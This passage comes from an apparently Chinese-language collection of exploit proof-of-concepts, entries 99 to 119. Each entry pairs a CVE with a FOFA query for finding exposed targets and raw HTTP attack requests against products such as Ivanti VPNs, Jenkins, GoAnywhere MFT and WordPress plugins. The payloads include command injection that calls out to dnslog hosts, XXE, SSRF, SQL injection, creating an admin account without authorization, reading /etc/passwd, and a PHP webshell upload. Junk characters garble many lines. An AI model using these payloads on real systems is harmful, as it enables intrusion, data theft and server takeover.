Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% f$ M S! e- \" t2 B
Content-Type: application/x-www-form-urlencoded; charset=UTF-80 E+ g# L5 s, e
X-Requested-With: XMLHttpRequest; M5 N* h. f6 Z0 b5 D b
$ O0 h# A; F* @
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B$ G5 ?) g. o! z9 y/ D
) ~, z9 |' v+ G0 E( O$ l
5 `% X2 P8 ]6 y! I, S! T99. Ncast盈可视高清智能录播系统busiFacade RCE9 f3 g( B; _% {+ Z. g1 b: h$ {/ @
CVE-2024-0305
, T1 e3 v) ~5 S+ H |FOFA:app="Ncast-产品" && title=="高清智能录播系统"
+ b. [" k% e5 s2 e. ?* ^POST /classes/common/busiFacade.php HTTP/1.14 T6 c% k i% O* Z
Host: 192.168.40.130:8080/ t; @: B2 f( u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- s$ T# q4 r* |' M& A- z$ W8 c. UConnection: close
4 q; C: R: v6 _- d' A. y0 sContent-Length: 154
, ]8 e0 y0 v. JAccept: */*- |3 j" ~* U2 q) ~1 O: S
Accept-Encoding: gzip, deflate, U8 n Y0 ?) `6 L3 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 A" S. Q; a) E
Content-Type: application/x-www-form-urlencoded; charset=UTF-86 {. t8 j% N( c/ u/ W0 F |6 s- b
X-Requested-With: XMLHttpRequest
) X9 h5 [% u) n! s- H# w# {! O- V1 {. Z
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D* U+ t3 ?% a* @
. ^. M# p+ f' h* f
$ P/ l0 a( L# a9 r100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传6 T( f* @! I: v
CVE-2024-0352
+ t; x- d/ I4 K& LFOFA:icon_hash="874152924"% t1 t" w2 D! j1 t4 q; [
POST /api/file/formimage HTTP/1.1
0 b. @ h4 c S% R$ c' J+ N; L$ C+ fHost: 192.168.40.130
# b5 J* l3 o0 W$ f9 e7 fUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.363 @ ]) i; `& j0 k9 A. o1 M$ Y
Connection: close
. V! q2 d) u/ K5 P: r G! y0 A4 q3 HContent-Length: 201
- Y* |8 V" ^1 p( r7 U3 S0 lContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
! U Z% x% E& zAccept-Encoding: gzip
1 e9 u" i" m! h! j$ P1 V* ~/ Z* `! R3 m2 ^; y& M1 I
------WebKitFormBoundarygcflwtei
/ d4 N; X- {4 X* x- a4 M/ F" dContent-Disposition: form-data; name="file";filename="IE4MGP.php"
) W @. o' _$ U% Q- p6 Y7 ^Content-Type: application/x-php+ K, O' ~; E; b/ C% n" L0 i
+ L, j+ v9 m$ E2 J2 Q2ayyhRXiAsKXL8olvF5s4qqyI2O4 \' _# b' U* Z" V% u
------WebKitFormBoundarygcflwtei--0 H% n f6 J% b- a5 X8 i
+ T7 _0 p* j# E! r2 G" Q6 Y
+ u2 ` E* @' x- u4 l5 N% t
101. ivanti policy secure-22.6命令注入1 ^; r2 n3 R0 I5 R& Z5 L
CVE-2024-21887# l: G" I! S0 [$ T
FOFA:body="welcome.cgi?p=logo"
% K o# Z) T% T1 [* s3 qGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
$ h8 H4 R# |2 o4 m8 V; V3 xHost: x.x.x.xx.x.x.x7 ]+ y) P$ f8 x& v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. M$ j# I h Y- r. ~# J0 ?Connection: close: F$ E; f+ _# ]% d
Accept-Encoding: gzip
1 c, P4 b) N! u1 q# d! s. B& H5 ?1 N- d9 \- T
1 b# ]! a: ~. t102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行$ r) O- M1 n0 o
CVE-2024-21893
. m1 {8 U: W. e# |7 `6 {) vFOFA:body="welcome.cgi?p=logo"
, x% n4 l/ z3 I) g' vPOST /dana-ws/saml20.ws HTTP/1.1
: y ?, p x5 T/ wHost: x.x.x.x9 @2 L7 Z9 S+ M5 H1 Y3 N# d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 ~5 E" o( [4 N4 o! p
Connection: close0 P9 w4 ^$ J z- H) c: d5 ^
Content-Length: 792# U2 C9 C3 i' _7 e
Accept-Encoding: gzip
; ]6 u- `7 R+ A- f/ y$ }, A; c0 L
5 h0 T9 [& M) V! K1 f<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>+ v& w1 v. r/ s) Y4 i- g0 X; W7 [
9 B; n. p4 K: a- s4 j# N7 S& Q; ^% Q; o; N103. Ivanti Pulse Connect Secure VPN XXE# o8 a' Z3 R; j# {8 ]4 U9 m2 Z6 h0 P
CVE-2024-220246 r: H; M1 O) K1 l1 G
FOFA:body="welcome.cgi?p=logo"
4 m1 j5 H3 }- |! sPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
- |/ n. D. ^; W# c- uHost: 192.168.40.130:111
, e; x J9 S# \User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
* z8 a4 u4 w# S, w& ~' R6 a1 `Connection: close
8 q( R- `5 l3 G N# LContent-Length: 204
/ T3 l4 ^# J/ |2 w/ e! ~Content-Type: application/x-www-form-urlencoded
/ D) q$ m8 P% h. W; C, DAccept-Encoding: gzip$ c* E4 A9 n5 x, c; f. \
% r/ K2 A) m3 i4 H7 }# d0 I0 K
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==' y/ j0 [1 X" G" _9 S1 w# X( P
5 @. Q+ _5 S; C, p6 n2 S' o& w$ q/ J$ L
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
. f9 _7 F4 x' Z0 q<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
: h3 |# w" |5 V& q* S6 O
3 n! l) F+ F& a. s
' v2 i3 a1 \0 _) Z5 }& ~104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
1 V# u6 [. T. B% y: l, M/ B" j ?CVE-2024-0569
3 R( |6 ?$ t& xFOFA:title="TOTOLINK"4 @8 V( P- ~5 D' e; {( j
POST /cgi-bin/cstecgi.cgi HTTP/1.1
; N4 W# I4 q7 [Host:192.168.0.14 A5 n e/ z+ Z: }6 u: J3 r# D
Content-Length:410 O( S" q! Y: x2 k: n
Accept:application/json,text/javascript,*/*;q=0.01& _' T7 ]* O; @& i* u* d7 `
X-Requested-with: XMLHttpRequest
v5 N1 R( j4 N [2 ]User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36) u( ], l1 U! K" \# Q+ [
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
X4 z- A. r6 Y0 Z1 E" X4 _" LOrigin: http://192.168.0.1% W0 ^! i4 M0 ^* v/ [
Referer: http://192.168.0.1/advance/index.html?time=1671152380564' o* a6 R8 j" d$ w) \0 Z- y
Accept-Encoding:gzip,deflate5 J, q/ M' q/ ~3 r! X
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7) v7 o# T. K1 H4 n8 s2 `( Y
Connection:close
( c% d8 [% m! \7 K
2 Q0 c3 ~( u) M. ?{5 l! E9 e8 q0 _* k. F, U
"topicurl":"getSysStatusCfg",) V; ~7 i5 f# J% g0 G* }! |
"token":"") u' N' Z3 e3 e- C+ M
}# H) O# P# b2 y2 `; ]- [
5 G0 |% |0 ~1 A! S7 e% }4 k3 F$ E105. SpringBlade v3.2.0 export-user SQL 注入
1 _: u6 H$ ^" g- ?FOFA:body="https://bladex.vip"9 |; m9 \: l' r$ S% Z* l- P! ]$ C
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
2 ~; w; E9 H& N4 k" x$ W
, U: m0 ?4 M. J0 ~* {: t; X106. SpringBlade dict-biz/list SQL 注入
) q$ F/ Z% Z# r4 ?2 ^& f% |FOFA:body="Saber 将不能正常工作"( S V3 O' K+ y, J. x+ l
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.10 R, c% |9 {3 e
Host: your-ip6 |. E! Q; \7 i5 I6 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' t4 I% d7 c9 o1 M5 W5 D6 s- p/ i( ]Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
$ l, U7 B8 P1 B7 s$ x( ZAccept-Encoding: gzip, deflate d6 [3 ^! J3 G+ G, y% A2 `* P
Accept-Language: zh-CN,zh;q=0.9
( {- g& g# \& d4 v8 K, V1 YConnection: close j- h/ A. E+ W8 `
% P( Z W' ^ `+ d
}6 @/ j' R2 s1 e! o4 O8 Q
107. SpringBlade tenant/list SQL 注入7 r5 V, g1 L% S7 b, I# C/ |+ Y
FOFA:body="https://bladex.vip"
- W( `. L( r1 ^# V1 SGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1& w% k) t' ?" Y9 O
Host: your-ip
/ ~/ G# I% }8 Q9 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ g! o2 i- Y1 r$ D6 A j/ z; xBlade-Auth:替换为自己的 T: ^' r2 A* |& v- H
Connection: close
, g! j7 V9 ?1 Y6 Z+ B) w
9 [. k! P9 ?. Y. [% \' |! T7 i8 y' j
108. D-Tale 3.9.0 SSRF* r" D+ R5 l1 s6 l* v0 T
CVE-2024-21642
5 i' ]$ G4 }$ c3 p$ DFOFA:"dtale/static/images/favicon.png"
+ }# n; { k. P& d+ [$ c! \8 CGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
) U% C. [3 Z, x9 M5 mHost: your-ip, X! c6 M0 s) ?( l N6 @3 S
Accept: application/json, text/plain, */*
6 A1 l$ n) d0 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[( s9 t2 b- L) m) y/ L: e# FAccept-Encoding: gzip, deflate6 G$ n: u3 g; Z: j! `
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 q! N8 W' w, N+ W, x9 }6 MConnection: close+ D* ]9 f( C. z8 ^' b; S6 M
2 I" B& \& z. J) y" K, T! [6 |/ ]- V! D
109. Jenkins CLI 任意文件读取
5 `- ^8 x7 x7 V& iCVE-2024-23897
) {( i% F8 e1 w: S- ]- QFOFA:header="X-Jenkins"7 [2 s+ ]7 f4 q; Y M6 N
POST /cli?remoting=false HTTP/1.1. @& s2 ? o4 L% Z
Host:3 A% a" G! i9 {7 s$ Z j
Content-type: application/octet-stream
8 w- b( [# Y% i" b5 A+ K" i( DSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92( {7 t. t2 m; q% [3 ^, R
Side: upload8 v- o0 u7 b' f6 }, c
Connection: keep-alive
: a# \, l# Q. Q9 G, @Content-Length: 163! [9 T6 \! N1 J( S* M- F7 c" W% j
' }5 p: O* K7 Eb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
/ X% I$ G8 H6 q8 \5 g+ W$ j& u2 D/ Q; m. ~: i4 d7 @0 J
5 i |" S: F: k- V" T/ _
POST /cli?remoting=false HTTP/1.1: k) B; S% Y( z& S2 q& V6 P. U# @
Host:6 E+ p b9 N0 t, a
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; l, q3 E) @/ j4 i' K
download
4 }5 ^& Z; W$ I7 Z/ r) Y& h- QContent-Type: application/x-www-form-urlencoded
! v! q, @# v. I) jContent-Length: 0$ u; Y: h( I( }3 x! g" {1 S( u4 A5 J
# T/ `3 O( h% E! O# p* i* Y& {# P+ F. } I b9 h/ c$ z
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin% a. V& p7 s1 u4 i$ s" y0 s! G* v
java -jar jenkins-cli.jar help$ E- K" }$ S0 f+ p% p' h
[COMMAND]
" T6 t% O3 W4 }5 |/ d2 K8 vLists all the available commands or a detailed description of single command.
1 E# q( G! Y8 s- ?1 D COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash) `3 ]9 d, j. G7 w3 m" ?
5 Z7 _, Q# ^- Z9 ^# L! l
8 l3 K1 j4 _; e3 y" d* j110. Goanywhere MFT 未授权创建管理员% q6 [" V2 B* v* ` S/ Z# ^8 Y5 s
CVE-2024-0204
5 p. A$ G5 w# `9 X3 dFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
# ?! T y8 D4 {* u, `: j7 @ ^GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.10 S8 V/ N3 M& u# [9 }3 ~9 F
Host: 192.168.40.130:8000 \- \! D2 f- ]; W& r/ x7 x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
4 f6 X9 v5 ]5 a4 w5 C# fConnection: close
- v% p. z: k0 b' v" F* EAccept: */*
; F) b8 N+ }3 m: l! a) zAccept-Language: en( s- D/ \ k& s0 d1 A+ X' o
Accept-Encoding: gzip0 o$ k2 Y* b6 N4 ~) ]1 z% I. d. I
$ E# Q5 g) O$ z4 O- w J* b$ B* N
111. WordPress Plugin HTML5 Video Player SQL注入% p( @" M# Q2 a- U1 s
CVE-2024-1061; }0 }$ `3 W4 V- b3 J9 m
FOFA:"wordpress" && body="html5-video-player"
. P6 f3 H9 R! d2 s# HGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1* X7 Q- ?( g, p+ F, |
Host: 192.168.40.130:112
! J* Q D& f+ G+ P7 RUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* O" E$ D! n2 _- ]& u1 }/ A4 _+ u9 P
Connection: close) R& [. b! {. ^) T& I7 X" N# r
Accept: */* E( ~5 t a0 r: _
Accept-Language: en5 [, S" v# O- p
Accept-Encoding: gzip
; q; F3 ^1 G" G4 W
7 j8 F: ~9 L7 A$ x0 y/ N5 {* A3 r
& i8 K+ q4 W9 x& t1 [3 |112. WordPress Plugin NotificationX SQL 注入3 F% W5 t- m* Y$ z6 d! E h, j; E
CVE-2024-1698
- B4 j3 p# [! p- }4 d( N% {9 {FOFA:body="/wp-content/plugins/notificationx": v! E8 p5 r7 S7 d
POST /wp-json/notificationx/v1/analytics HTTP/1.1. i( u. l, e' z4 d
Host: {{Hostname}}
! z3 s; Q s. t' e! wContent-Type: application/json; u6 d$ X ~, R1 S
/ U2 }3 U1 d+ P& o
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}8 T/ n4 m2 {- Z, _& c
( L( ?/ F2 N. B# m2 L9 J, p Y( r0 p1 m0 w, \
113. WordPress Automatic 插件任意文件下载和SSRF
P' H* |' I" i6 hCVE-2024-27954
3 s7 K, d O2 hFOFA:"/wp-content/plugins/wp-automatic"
+ A* d' J- Y: kGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1, y: T; [6 n. n8 R# H) D# g' R
Host: x.x.x.x
1 F2 {; Q: F2 N+ L) Z/ U5 h% f rUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.363 \9 i& b9 X7 `+ K' V
Connection: close, y6 V! }* l5 | z- W8 Z7 K. {: B
Accept: */*# `( Z* B9 g' z3 ~% A4 p9 y
Accept-Language: en/ I! C+ Q: [2 b7 u1 }
Accept-Encoding: gzip6 j! c8 [' R3 ~/ f* b
( _+ f4 _' i9 k; `% R6 V; H9 w- H* C0 P `8 ]6 O
114. WordPress MasterStudy LMS插件 SQL注入! o- c9 ?4 | D2 S* }/ s
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"2 ~' `2 [7 ]8 w2 j7 \
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
3 R9 H8 ~, ~! JHost: your-ip x# V0 [4 ]( e
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ u7 Q0 N# N, ?1 y5 ]7 O1 |0 xAccept-Charset: utf-8
4 W l$ g, z3 X3 VAccept-Encoding: gzip, deflate( T O6 Q- F% a( Q! b: Z
Connection: close0 n6 R2 J3 w: e! _( W' r1 W
. |* c5 H2 q$ c, Y! o6 P* J8 L; f6 T) c. b
115. WordPress Bricks Builder <= 1.9.6 RCE( A% X# x7 s6 x2 A
CVE-2024-25600, u# ^/ o6 e; `- {3 c* Z
FOFA: body="/wp-content/themes/bricks/" o, O/ b# p4 A8 _
第一步,获取网站的nonce值1 p4 T7 v7 d! c7 P3 \/ C7 l5 A. L
GET / HTTP/1.1* k7 a5 w# I2 X8 b
Host: x.x.x.x
) [; ]0 T5 }' o/ i! R: U3 |; @* tUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 }/ D7 s! F5 x; B1 K5 a' t; e
Connection: close
) [) A" _0 j$ r" Z( p. mAccept-Encoding: gzip
8 O6 D3 a+ C7 q7 j9 B# g$ [
0 l9 c6 A- L c2 E
2 z$ P& L: R9 `6 Z; j' j$ `第二步替换nonce值,执行命令
1 [0 Z( @ T8 q; z) HPOST /wp-json/bricks/v1/render_element HTTP/1.1
( m7 [" N- X7 M7 G5 } m6 j; [0 fHost: x.x.x.x" @- i, S8 d- }; l2 y' R6 w4 d$ d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 k; }3 E5 l8 I1 @7 M
Connection: close
/ z; j3 b5 [6 o4 n5 [% r* XContent-Length: 356. Q* z4 q9 M2 \( s, F* V4 ]
Content-Type: application/json8 u2 C" w V3 k4 @) B0 m: J
Accept-Encoding: gzip( H% Q7 @; M: H C: I7 v9 @% Q
$ x3 ^# q1 c! i( H8 G{3 c1 _% A8 g6 T* P+ l
"postId": "1",0 n5 F: l4 W" r7 h' u1 h
"nonce": "第一步获得的值",
5 J* w1 w( x) u+ X "element": {
2 ~. g5 T% K, ], D9 f5 x "name": "container",; [0 k6 \6 F( X, f/ F6 N
"settings": {
2 Y8 h' H' N) F "hasLoop": "true",
9 R& ]; h! W2 O. I- V; p3 n: Q& ` "query": {+ m) |8 R- _; Q2 Y( i8 p& G
"useQueryEditor": true,4 h8 L6 N, U1 X# n# h
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",& y1 w/ l6 D( @: ^- n
"objectType": "post"9 e9 U! m/ G' p4 y1 ~6 O5 ?5 i7 t
}
$ R6 [, a) V0 `3 a2 ^, }! a- M& K- P }/ d1 ]+ N) a4 S: T
}* J1 I$ c3 I2 N3 j! N
}* z# O+ b6 S+ g8 c
7 A/ R, G; a, J7 T' U( u7 m* }+ c) V, P. J- y0 W$ O* I
116. wordpress js-support-ticket文件上传9 b# k0 v) N& |4 I& U* S
FOFA:body="wp-content/plugins/js-support-ticket"
1 \4 R% [- M+ s* r% yPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
/ \" E0 R( n3 n' gHost:) d/ ~! _# v7 u) r
Content-Type: multipart/form-data; boundary=--------767099171. x1 D; P+ x; Z" k( a* g, `
User-Agent: Mozilla/5.0
4 Q8 v# k$ n6 H6 v+ [, y' l: J
% Y! U, ?% N! T. e9 M& `----------7670991711 z" H9 g1 U# S
Content-Disposition: form-data; name="action"
2 \( f: f2 T4 R' Hconfiguration_saveconfiguration8 C b4 s. |1 r0 Z5 _+ ]' ^6 x4 w
----------767099171
; C5 ?$ @4 r# u0 fContent-Disposition: form-data; name="form_request"
& l/ O: ?6 i( ~6 a0 N4 njssupportticket+ V- X9 n# d" |0 m
----------767099171
4 E) \! y8 I& q' p1 N+ [Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"3 A+ D( W" V: q7 k
Content-Type: image/png
) e! ^/ N! m! d. y C* c+ @----------767099171--1 h1 |# T) Y- Q
, ~7 p$ ]! Q7 y$ _
+ @/ ]& p, z; v8 r- T' {% U4 B3 H
117. WordPress LayerSlider插件SQL注入7 r! K/ ~7 V4 H; r0 A
version:7.9.11 – 7.10.0
/ Y# G) u) ?0 e1 G! @+ ^+ i2 f, EFOFA:body="/wp-content/plugins/LayerSlider/", P4 x4 r3 U' g( ~% _
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1) R- a$ U9 z" q) E
Host: your-ip+ G. g+ j& L/ w% Y8 S6 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 U6 P) Q6 c6 D8 G9 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) y( W4 g" }, f8 i( q# Q% S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 y6 X$ Z. i2 p9 X4 y1 @: O l
Accept-Encoding: gzip, deflate, br- o' x7 |6 [: n" B | r3 c
Connection: close
; }+ w8 h: e7 ]Upgrade-Insecure-Requests: 1
6 r* m1 k k# g9 E* j+ T1 t* j7 I8 A1 [7 E# {, f- d7 E+ v L0 x
1 n S3 B% w- F, g6 V# J118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ Q$ R) \( z4 `( ?: K7 Z6 ZCVE-2024-0939
% D/ f/ \. d2 P* D( g$ W& ^FOFA:title="Smart管理平台"
1 _4 Z( y6 [5 d' }+ l0 m' W4 K0 M& {POST /Tool/uploadfile.php? HTTP/1.19 c. z4 q/ }3 G" i9 q. e
Host: 192.168.40.130:84436 q3 l* f6 X2 n
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8& F' N5 w @$ |9 i }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.03 Y4 B# a/ @8 y9 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 P) J0 P9 k9 |. CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. X w9 V. }7 k Z: v1 U
Accept-Encoding: gzip, deflate
; s4 E; }% t" s' c+ MContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
" c4 P/ z; D+ h3 r. }* M8 F) ^Content-Length: 405/ X- r& q2 m# N4 V6 K% C0 D" {
Origin: https://192.168.40.130:84435 C L" Z0 \5 B2 r: }- l
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
. \6 G$ _) C$ z9 T) G) }6 @2 g; i7 }Upgrade-Insecure-Requests: 1 X: l( L% r- _% d( L. o+ [2 R
Sec-Fetch-Dest: document
$ D1 h# r6 G$ Y, M1 M. N7 }1 eSec-Fetch-Mode: navigate& l9 X4 t% B" i- }/ w, q& t
Sec-Fetch-Site: same-origin
" J$ F; n) t1 q: r! _5 j% I2 ~$ ySec-Fetch-User: ?1$ ^4 m) v$ O4 h" L* O
Te: trailers
+ [8 V7 k& Y% Z& _. a+ W nConnection: close5 U2 U$ ?, j/ z' O1 m
% G# b/ x2 X; N8 ~# h8 ~8 j. ^7 n-----------------------------139797012227476466340371828872 s* t. F! S" ^! H* ?7 U! b8 Y2 |
Content-Disposition: form-data; name="file_upload"; filename="contents.php"' i; ~; A% G* l2 e# A# K; Q! _0 s
Content-Type: application/octet-stream- K# Z. u6 g/ C7 R
# U/ c. k' U4 W7 y# J<?php; n! D1 B* K3 o0 |
system($_POST["passwd"]);' ~0 g% x" I1 E7 W
?>
$ o; C; ?" t( w* C" n# e3 Z/ {-----------------------------13979701222747646634037182887/ [$ N& r0 ~3 R' _0 a3 B% d
Content-Disposition: form-data; name="txt_path"
# A9 O5 p# b& r% s; }0 f2 Z# r/ ], T0 h/ e8 w9 @6 F. Q
/home/src.php( i5 }9 F8 J! _" C' V
-----------------------------13979701222747646634037182887--
; v6 ]& F$ C; o4 K) S/ c
2 q. p* N0 w4 l! F2 _8 M
& _' h. j' A5 P& r; Y访问/home/src.php1 [5 y9 I# |; s- k' A
0 B0 K6 _ I% c
119. 北京百绰智能S20后台sysmanageajax.php sql注入
7 P2 X. R" T" }/ wCVE-2024-1254
z% w* j7 L" OFOFA:title="Smart管理平台"
9 d. R, b: u5 u6 {/ o. K先登录进入系统,默认账号密码为admin/admin
; U% B, U6 W0 B6 n# k/ g: mPOST /sysmanage/sysmanageajax.php HTTP/1.11" X7 t4 p# ]' P4 y' t
Host: x.x.x.x* F+ B. S1 q7 W1 z
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee) v4 o1 m8 S2 v7 p2 i& |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
* ~7 ^" D1 M. YAccept: */*. G; I# g( [# K) a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 F1 a t T& A1 F
Accept-Encoding: gzip, deflate
' T- c% H7 l/ a3 DContent-Type: application/x-www-form-urlencoded;
! t- |" k* Q* D1 a5 L( T) Q) KContent-Length: 109/ \+ S& u& j0 z1 G: Q( A1 K5 U; {
Origin: https://58.18.133.60:8443
; ^7 X0 V' Q1 N. PReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php5 Y4 p' K: c2 U3 I9 `5 }
Sec-Fetch-Dest: empty5 d" t$ K5 s+ H. e$ w1 g# |/ a
Sec-Fetch-Mode: cors5 X2 Q0 T+ i% e7 r5 G
Sec-Fetch-Site: same-origin3 e6 i; ?1 R8 h3 T5 {1 U3 a
